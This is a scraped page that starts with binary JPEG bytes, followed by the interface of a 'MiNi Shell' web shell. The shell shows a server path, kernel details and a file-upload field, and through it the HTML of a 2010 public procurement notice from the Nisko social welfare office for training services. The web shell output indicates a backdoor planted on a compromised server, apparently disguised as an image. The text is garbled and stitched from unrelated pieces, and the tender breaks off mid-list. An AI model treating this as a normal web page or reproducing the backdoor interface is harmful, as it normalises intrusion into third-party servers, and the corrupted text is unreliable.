JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100514/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100514/130934-N-2010.html

<p class="kh_header"><b>Nisko: Trening kompetencji i umiejętność społecznych oraz szkolenia zawodowe w ramach projektu systemowego Czas na aktywność w Gminie i Mieście Niskowspółfinansowanego ze środków Unii Europejskich w ramach Europejskiego Funduszu Społecznego</b><br>
<b>Numer ogłoszenia: 130934 - 2010; data zamieszczenia: 14.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Pomocy Społecznej , ul. 3 Maja 10, 37-400 Nisko, woj. podkarpackie, tel. 015 8412334, faks 015 8412334.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ops.nisko.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Trening kompetencji i umiejętność społecznych oraz szkolenia zawodowe w ramach projektu systemowego Czas na aktywność w Gminie i Mieście Niskowspółfinansowanego ze środków Unii Europejskich w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Szczegółowe określenie zakresu znajduje się w załączniku nr 1 do ogłoszenia.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Przedmiotem zamówienia może byc powtórzenie tego samego rodzaju szkolenia w wielkości nie wiekszej niż 50 % wartości usługi</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ust.1 pkt 1 
W zakresie potwierdzenia posiadania koncesji, zezwoleń lub licencji Wykonawca winien dysponować następującymi dokumentami :

wpis do rejestru instytucji szkoleniowych, prowadzony przez właściwy - dla siedziby jednostki szkoleniowej - wojewódzki urząd pracy (Rozporządzenie Ministra Gospodarki i Pracy z dnia 27.10.2004 r. w sprawie rejestru instytucji szkoleniowych w związku z art.20 ust.1 ustawy o promocji zatrudnienia i instytucjach rynku pracy z dnia 20.04.2004 r. - Dz. U. Nr 99, poz.1001 z późniejszymi zmianami);</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	Oświadczenie o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ust.1 pkt 2 
b)	wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te usługi zostały wykonane lub są wykonywane należycie
c)	Wykaz  niniejszy  winien  obejmować wykonanie co najmniej:
 Dla Zadania nr 1 - 2 szkolenia w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia odpowiadającym swoim rodzajem i zakresem usługom stanowiącym przedmiot zamówienia.
Dla Zadania 2 - 3 szkolenia w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia o wartości nie mniejszej niż 50 tyś brutto odpowiadającym swoim rodzajem i zakresem usługom stanowiącym przedmiot zamówienia.
W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniana będzie ich łączna sytuacja w zakresie doświadczenia  - w tym celu dokumenty ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie tego warunku</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ust.1 pkt 2
Dysponowanie lokalem umożliwiającym prowadzenie zajęć tj  Trening kompetencji i umiejętności społecznych musi odbywać się na terenie miasta Niska a szkolenia/kursy muszą odbywać się na terenie miasta Niska lub w jego bliskiej odległości (nie większej niż 15 km od granic miasta )

Wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług w celu realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami
W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniana będzie ich łączna sytuacja w zakresie potencjału technicznego  - w tym celu dokumenty ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie tego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ust.1 pkt 3 
b) Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami; co najmniej: 
- Zajęcia teoretyczne muszą być prowadzone przez co najmniej jedną osobę z wykształceniem wyższym, z co najmniej 5 letnim stażem pracy.
- Zajęcia praktyczne muszą być prowadzone przez co najmniej jedną osobę z wykształceniem minimum średnim, i co najmniej 2 letnim doświadczeniem zawodowym.
W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniana będzie ich łączna sytuacja w zakresie dysponowania osobami zdolnymi do wykonania zamówienia  - w tym celu dokumenty ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie tego warunku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) Oświadczenie o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ust.1 pkt 4 
b) Warunek tylko dla Zadania 2. Posiadać ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności (zakres odpowiedzialności określa art.415 i 471 Kodeksu cywilnego (Dz.U. z 1964 r. nr 16,poz.93 z późn. zm.)wysokości co najmniej: 50 000 PLN. 
W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są przedłożyć polisę ubezpieczeniowa wraz z udokumentowaną opłatą
W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniana będzie ich łączna sytuacja ekonomiczna i finansowa - w tym celu dokumenty ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie tego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W przypadku, gdyby nastąpiła konieczność dokonania zmian w kadrze dydaktycznej, której nie można było przewidzieć w chwili podpisania  umowy, Wykonawca jest zobowiązany niezwłocznie zawiadomić pisemnie Zamawiającego o zaistniałej sytuacji. Jeżeli Zamawiający uzna, że przyczyna zmiany jest uzasadniona, wówczas Wykonawca musi przedstawić kandydaturę osoby o kwalifikacjach równorzędnych lub wyższych od tych jakie posiadała osoba wykonująca zamówienie. Zmiana kadry dydaktycznej może nastąpić wyłącznie wtedy, gdy jest korzystna dla Zamawiającego i Zamawiający wyrazi na nią zgodę.
W zakresie terminu wykonania zamówienia w przypadku wystąpienia obiektywnych czynników niezależnych od Zamawiającego i Wykonawcy lub jakiegokolwiek opóźnienia, utrudnienia lub przeszkody spowodowane przez lub dające się przypisać Zamawiającemu, personelowi Zamawiającego lub innemu wykonawcy zatrudnionemu przez Zamawiającego przy realizacji przedmiotu umowy.
We wszystkich powyższych przypadkach termin realizacji przedmiotu Umowy może ulec przedłużeniu, o czas niezbędny do usunięcia przeszkody przy realizacji zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ops.nisko.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie Zamawiającego pok. nr 7 sekretariat Ośrodka Pomocy Społecznej w Nisku..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.05.2010 godzina 09:30, miejsce: W siedzibie Zamawiającego pok. nr 7 sekretariat Ośrodka Pomocy Społecznej w Nisku.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pn.: Czas na aktywność w Gminie i Mieście Nisko współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII. Promocja integracji społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej...</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Trening kompetencji i umiejętności społecznych w ramach projektu systemowego Czas na aktywność w Gminie i Mieście Nisko.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Celem głównym zorganizowania treningu kompetencji i umiejętności społecznych jest rozwój i doskonalenie umiejętności interpersonalnych niezbędnych w przeciwstawianiu się sytuacji bezradności i wykluczeniu społecznemu.                                                            Celem ogólnym jest m.in. nabycie większej pewności siebie i wiary we własne możliwości, budowanie poczucia własnej wartości, nauczenie się podstawowych zasad komunikacji interpersonalnej, budowanie pozytywnego obrazu siebie oraz motywacji do podejmowania nowych zadań, zdobywanie umiejętności samodzielnego podejmowania decyzji oraz skutecznego realizowania zadań.                                                                    Tematy realizowane podczas zajęć to m.in. świadomość siebie- poznaj siebie; autodiagnoza- test; asertywność; komunikacja werbalna i umiejętność werbalizowania myśli i opinii; pojęcie konfliktu, jego źródeł, dynamiki oraz poznanie sposobów jego rozwiązywania, poznanie modeli negocjacji partnerskich; radzenie sobie z krytyką; wykorzystanie umiejętności negocjacyjnych i mediacyjnych w realnych sytuacjach osobistych, społecznych i zawodowych.                                                                            1.Warsztat zarządzania czasem -20 godzin.                                                                         2. Warsztat umiejętności komunikacyjnych-20 godzin.                                                        3. Warsztat umiejętności wychowawczych-10 godzin.                                                          4. Warsztat rozwiązywania konfliktów-20 godzin.                                                              5. Trening asertywności -20 godzin.                                                                                                            6. Warsztaty aktywnego poszukiwania pracy-20 godzin.                                                        Zajęcia realizowane grupowo w dwóch grupach po 12 osób czyli po 110 godzin na grupę.	24.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Szkolenia zawodowe w ramach projektu systemowego Czas na aktywność w Gminie i Mieście Nisko.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Kosmetyczka-fryzjer	Celem szkolenia jest przygotowanie do pracy w zawodzie kosmetyczka-fryzjer w zakresie pracy Wykonywanie zabiegów z zakresu kosmetyki pielęgnacyjnej, leczniczej i upiększającej. 
Program winien zakładać uzyskanie niezbędnych umiejętności praktycznych, takich jak: znajomość technik pielęgnacyjnych i zdobniczych, masażu oraz kosmetyki z wykorzystaniem urządzeń elektrycznych. 
Program powinien obejmować podstawowy poziom szkolenia w wymiarze 150 godzin realizacji zajęć, głównie w formie pokazów, ćwiczeń i zadań praktycznych. 
Oczekiwane rezultaty: 
W wyniku realizacji szkolenia absolwent powinien nabyć umiejętności: 
- diagnozować stan skóry twarzy i ciała na podstawie badania organoleptycznego i przeprowadzonego wywiadu, zgodnie z zasadami postępowania kosmetycznego; 
- zastosować aparaty i lampy kosmetyczne zgodnie z przeznaczeniem; 
- wykonywać zabiegi pielęgnacyjne na dłonie i stopy oraz manicure i pedicure, stylizację paznokci, 
- wykonywać zabiegi pielęgnacyjne na twarz i ciało dostosowane do potrzeb skóry, stosując odpowiednie preparaty lecznicze i pielęgnacyjne oraz aparaturę; 
- udzielać porad z zakresu pielęgnacji skóry twarzy i ciała w domu,
-znać zasady BHP w pracy fryzjera oraz narzędzia, przyboru i aparaty wykorzystywane we fryzjerstwie,
-rozpoznawać budowę włosa, choroby włosa i skóry głowy,
-znać kosmetyki i środki chemiczne wykorzystywane we fryzjerstwie wraz z zasadami ich stosowania,
-wykonywać mycie głowy, pielęgnację włosów, suszenie, odżywianie włosów,
-dobieranie fryzur w tym komputerowe,
-układnie fryzur, masaż relaksujący głowy,
-wykorzystywać techniki ondulacji, balejażu, farbowania, barwienia włosów,  
-stylizacja, modelowanie włosów,
-techniki przycinania, skracania włosów.
Wykonawca odpowiedzialny będzie za badania lekarskie i sanepidowskie (w przepadku szkolenia, które wymaga takiego badania).
2.	Kucharz-kelner-barman	Celem szkolenia jest nabycie przez kursantów umiejętności i wiedzy niezbędnej do wykonywania pracy na stanowisku kucharz-kelner-barman oraz zapoznanie się z zasadami etyki w zawodzie kucharz-kelner-barman. 
Cele ogólne: 
Program winien zakładać uzyskanie niezbędnych umiejętności praktycznych, takich jak: 
- przygotowanie stanowiska pracy zgodnie z wymogami, 
- pobieranie surowców i półproduktów do produkcji kulinarnej, 
- zabezpieczanie surowców, półproduktów i wyrobów gotowych przed zepsuciem, 
- dokonywanie oceny organoleptycznej i estetycznej surowców kulinarnych, półproduktów i wyrobów gotowych, 
- prowadzenie obróbki wstępnej surowców (ręcznej, mechanicznej i termicznej), 
- wykonywanie różnymi technikami i metodami (zgodnie z normami surowcowymi), asortymentów potraw z warzyw, owoców, grzybów, mleka i przetworów mięsnych, dziczyzny, drobiu, ryb oraz potraw z podrobów, potraw półmięsnych i jarskich, wyrobów garmażeryjnych, 
- przestrzeganie higieny osobistej i higieny pracy, 
- posługiwanie się narzędziami, maszynami i urządzeniami przy przygotowywaniu potraw i napojów oraz ich bieżąca konserwacja, 
- ekspedycja wyrobów kulinarnych (w zakresie podstawowym), 
- wykonywanie potraw kuchni regionalnych i innych narodów, 
- przygotowanie potraw, specjalistycznych (dietetycznych), 
- przygotowanie potraw, napojów i deserów na przyjęcia okolicznościowe, 
- utrzymywanie na bieżąco czystości na stanowisku pracy,                                                       - obsługa kelnerska i organizacja pracy,                                                                                 - etykieta zawodowa,                                                                                                                    - sprzęt kelnerski,
- układanie kart menu oraz kart win i wódek,
- obsługiwanie konsumenta przy barze,
- doradzanie konsumentowi w zakresie wyboru potraw i napojów,
- wykonywanie kalkulacji potraw i napojów,
- dokonywanie rozliczeń materiałowych, technologicznych i finansowych,                                                                                                           - radzenie ze stresem i trudnym klientem,                                                                                     - obsługa kasy fiskalnej,
- przestrzeganie przepisów sanitarno - epidemiologicznych, bhp i p. poż. obowiązujących w zakładach zbiorowego żywienia.
Wykonawca odpowiedzialny będzie za badania lekarskie i sanepidowskie (w przepadku szkolenia, które wymaga takiego badania).
2	Opiekunka osób starszych i niepełnosprawnych	Celem szkolenia jest przygotowanie do pracy w charakterze opiekunki domowej, która wykonuje zadania związane z zapewnieniem bezpieczeństwa i zaspokojenia podstawowych potrzeb osób lub środowiska powierzonego jej opiece z wykorzystaniem sprzętu stanowiącego własność pracodawcy. 
W zależności od potrzeb praca opiekunki domowej może być skierowana na: 
- opiekę nad osobą starszą i niepełnosprawną, 
Cele ogólne 
W zakresie pracy: opieka domowa nad osobą starszą i niepełnosprawną zakłada się, że po zakończonym procesie kształcenia uczestnicy szkolenia będą przygotowani do następujących zadań: 
- wykonywanie codziennych czynności związanych z prowadzeniem gospodarstwa domowego, 
- wykonywanie czynności higienicznych przy podopiecznym, 
- wspieranie biologicznych funkcji życiowych podopiecznego, 
- organizowanie czasu podopiecznemu i dotrzymywanie towarzystwa. 
Oczekiwane rezultaty 
Założone cele kształcenia i zakres tematyczny szkolenia skierowane są na kształtowanie praktycznych umiejętności i postępowania w domowej opiece nad osobą starszą i niepełnosprawną. 
Oczekuje się, że po zakończonym procesie kształcenia absolwent szkolenia będzie potrafił: 
- zorganizować całodzienną opiekę dla starszej lub niepełnosprawnej osoby, 
